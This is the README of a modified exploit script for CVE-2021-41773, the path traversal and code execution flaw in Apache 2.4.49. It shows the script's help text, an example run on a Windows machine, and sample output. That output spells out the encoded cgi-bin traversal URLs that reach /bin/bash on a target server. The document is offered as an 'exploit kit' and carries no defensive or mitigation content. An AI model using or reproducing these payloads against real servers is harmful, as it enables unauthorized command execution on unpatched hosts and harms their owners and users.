CVE-2021-41773 exploit by Gaurav Jav modified by Plunder in order to use custom exploit
Usage :
$ py exploit.py -h
usage: exploit.py [-h] -t TARGET [-b BINARY]
Apache2 2.4.49 Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Specify the target IP or Domain. eg: 127.0.0.1 or example.com
-b BINARY, --binary BINARY
Specify the binary file to execute. eg: /bin/sh (/bin/sh by default)
exemple :
PS C:\Users\Mateo\Downloads\Apache 2.4.49 -- exploit kit> py exploit.py -t <ip> -b /bin/bash
--------------------------------------------------------------------------------------------
| Apache2 2.4.49 - Exploit |
| Author : Gaurav Raj |
| Modified by : Plunder |
--------------------------------------------------------------------------------------------
url : <ip>
binary used : /bin/bash
http path traversal url : http://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
https path traveral url (relative): https://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
>>>
Gurav Jave project : https://github.com/thehackersbrain/CVE-2021-41773